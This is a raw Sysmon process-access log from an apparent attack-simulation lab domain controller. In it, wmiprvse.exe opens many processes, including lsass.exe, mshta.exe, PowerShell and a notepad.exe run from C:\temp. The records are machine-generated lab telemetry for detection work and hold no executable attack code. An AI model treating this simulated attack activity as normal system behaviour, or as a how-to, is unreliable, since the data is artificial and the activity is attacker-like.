16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030926Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030925Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030924Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030923Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030922Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030921Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030920Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030919Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:34.362{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031117Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.659{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55FA-6008-FF06-00000000A301}7712C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031116Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.659{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55FA-6008-FE06-00000000A301}4544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031115Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.659{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55FA-6008-FD06-00000000A301}6088C:\temp\notepad.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031114Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.659{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-55CB-6008-F206-00000000A301}2880C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031113Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.659{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031112Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.659{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031111Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.659{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031110Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.659{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031109Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.659{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031108Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.659{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031107Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:10:35.659{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000031106Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 